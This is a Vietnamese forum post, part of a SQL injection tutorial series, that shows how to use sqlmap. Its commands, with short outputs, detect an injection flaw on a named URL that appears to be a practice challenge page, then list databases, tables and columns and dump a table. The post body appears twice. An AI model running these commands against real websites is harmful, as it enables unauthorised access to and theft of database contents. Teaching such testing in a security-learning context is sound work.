Bây giờ là:
Đăng Nhập
Quy định và điều bạn cần biết
Mon Dec 30, 2013 9:13 am by Admin
DIỄN ĐÀN VUI LÀ CHÍNH KHÔNG PHẢI LÀ WEBSITE CHÍNH THỨC
☞ Giao lưu không cay cú
☞ Các mem không spam icon
☞ Các mem có quyền phản ánh mod với cách làm việc
☞ Các mem không sử dụng ngôn từ không thích hợp
1/ Các bài viết, hình ảnh, nhạc... gởi vào diễn đàn không được:
* Toàn bộ phần chủ đề (hoặc nội …
☞ Giao lưu không cay cú
☞ Các mem không spam icon
☞ Các mem có quyền phản ánh mod với cách làm việc
☞ Các mem không sử dụng ngôn từ không thích hợp
1/ Các bài viết, hình ảnh, nhạc... gởi vào diễn đàn không được:
* Toàn bộ phần chủ đề (hoặc nội …
Comments: 1
Latest topics
SQL injection - Một số tool khai thác P6
Trang 1 trong tổng số 1 trang
SQL injection - Một số tool khai thác P6
Một số tool khai thác
Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cho phép phát hiện vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:
Dưới đây tôi sẽ demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản.
Bạn download Sqlmap tại http://sqlmap.org/
Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn có thể download python tạihttp://www.python.org/downloads/
Đầu tiên bạn phải xác định được website mục tiêu, ở đây tôi có mục tiêu sau:
http://zerocoolhf.altervista.org/level1.php?id=1
Bước 1: Mở cmd và gõ lệnh như sau:
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”[/ltr]
sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào đưa ra thông tin về lỗ hổng.
Bước 2: Khi đã xác định được là website mục tiêu tồn tại lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu.
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs[/ltr]
=>Cơ sở dữ liệu: my_zerocoolhf
Bước 3: Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu.
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf[/ltr]
=> Có 2 bảng trong cơ sở dữ liệu: auth và book
Bước 4: Xác định tên các cột trong bảng
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book[/ltr]
=> Xác định được các cột trong bảng book: author, id, price, title.
Bước 5: Dump dữ liệu từ bảng.
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book[/ltr]
=> Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu.
Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn có thể tìm hiểu thêm các tùy chọn của sqlmap tại https://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection.
Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cho phép phát hiện vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:
Dưới đây tôi sẽ demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản.
Bạn download Sqlmap tại http://sqlmap.org/
Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn có thể download python tạihttp://www.python.org/downloads/
Đầu tiên bạn phải xác định được website mục tiêu, ở đây tôi có mục tiêu sau:
http://zerocoolhf.altervista.org/level1.php?id=1
Bước 1: Mở cmd và gõ lệnh như sau:
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”[/ltr]
sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào đưa ra thông tin về lỗ hổng.
Bước 2: Khi đã xác định được là website mục tiêu tồn tại lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu.
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs[/ltr]
=>Cơ sở dữ liệu: my_zerocoolhf
Bước 3: Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu.
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf[/ltr]
=> Có 2 bảng trong cơ sở dữ liệu: auth và book
Bước 4: Xác định tên các cột trong bảng
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book[/ltr]
=> Xác định được các cột trong bảng book: author, id, price, title.
Bước 5: Dump dữ liệu từ bảng.
Mã:
[ltr]python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book[/ltr]
=> Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu.
Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn có thể tìm hiểu thêm các tùy chọn của sqlmap tại https://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection.
Mr.Keen- Admin
- Tổng số bài gửi : 46
Join date : 30/12/2013
Age : 28
Đến từ : Phong Điền Cần Thơ
Similar topics
» SQL injection – Các hướng khai thác P3
» SQL injection - Các con đường khai thác khác P2
» SQL injection - Các bước khai thác khác P4
» SQL injection - Con đường khai thác phổ biến: qua “user input”.P1
» SQL injection - Một số kỹ thuật vượt qua cơ chế lọc P5
» SQL injection - Các con đường khai thác khác P2
» SQL injection - Các bước khai thác khác P4
» SQL injection - Con đường khai thác phổ biến: qua “user input”.P1
» SQL injection - Một số kỹ thuật vượt qua cơ chế lọc P5
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
|
|
Sun Sep 21, 2014 7:32 pm by anhkhoa1597
» Hướng dẫn mod khung viền trong LMHT
Tue Jul 22, 2014 2:31 pm by ltn1993st
» Cần lời Gải Thích
Fri Jul 11, 2014 1:21 pm by Admin
» Van Gaal: Thiên tài hay kẻ phụ bạc từ góc nhìn tâm lý học
Tue Jul 08, 2014 12:33 pm by Admin
» Brazil – Đức: Điệu Samba loạn nhịp trước “xe tăng”
Tue Jul 08, 2014 12:23 pm by Admin
» Anh K giải thích cái này nhé!
Fri Jun 06, 2014 6:46 am by Mr.Keen
» SQL injection - Các cách phòng chống và kết luận P7
Sun May 11, 2014 3:34 pm by Mr.Keen
» SQL injection - Một số tool khai thác P6
Sun May 11, 2014 3:33 pm by Mr.Keen
» SQL injection - Một số kỹ thuật vượt qua cơ chế lọc P5
Sun May 11, 2014 3:32 pm by Mr.Keen